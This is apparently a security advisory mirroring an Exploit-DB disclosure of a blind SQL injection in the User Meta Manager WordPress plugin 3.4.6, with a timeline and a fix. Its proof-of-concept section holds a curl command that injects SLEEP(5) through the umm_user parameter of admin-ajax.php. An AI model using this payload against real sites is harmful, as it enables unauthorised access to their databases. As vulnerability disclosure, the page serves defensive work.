WordPress User Meta Manager Plugin [Blind SQLI]

vendor:

User Meta Manager

by:

Panagiotis Vagenas

7,5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: User Meta Manager

Affected Version From: 3.4.6

Affected Version To: 3.4.6

Patch Exists: YES

Related CWE: N/A

CPE: a:jasonlau:user_meta_manager:3.4.6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WordPress 4.4.1

2015

WordPress User Meta Manager Plugin [Blind SQLI]

AJAX actions `umm_edit_user_meta` and `umm_delete_user_meta` of the User Meta Manager for WordPress plugin up to v3.4.6 are vulnerable to blind SQL injection attacks. A registered user can pass arbitrary MySQL commands to `umm_user` GET param.

Mitigation:

Update to version 3.4.7 or later

Source

Exploit-DB raw data:

* Exploit Title: WordPress User Meta Manager Plugin [Blind SQLI]
* Discovery Date: 2015/12/28
* Public Disclosure Date: 2016/02/04
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://jasonlau.biz/home/
* Software Link: https://wordpress.org/plugins/user-meta-manager/
* Version: 3.4.6
* Tested on: WordPress 4.4.1
* Category: webapps

Description
================================================================================

AJAX actions `umm_edit_user_meta` and `umm_delete_user_meta` of the User Meta 
Manager for WordPress plugin up to v3.4.6 are vulnerable to blind SQL injection
attacks. A registered user can pass arbitrary MySQL commands to `umm_user` GET 
param.

PoC
================================================================================


curl -c ${USER_COOKIES} \
    "http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
    &umm_sub_action=[umm_delete_user_meta|umm_edit_user_meta]&umm_user=SLEEP(5)"


Timeline
================================================================================

2015/12/28 - Discovered
2015/12/29 - Vendor notified via support forums in WordPress.org
2015/12/29 - Vendor notified via contact form in his site
2016/01/29 - WordPress security team notified about the issue
2016/02/02 - Vendor released version 3.4.7
2016/02/02 - Verified that this exploit no longer applies in version 3.4.7

Solution
================================================================================
  
Update to version 3.4.7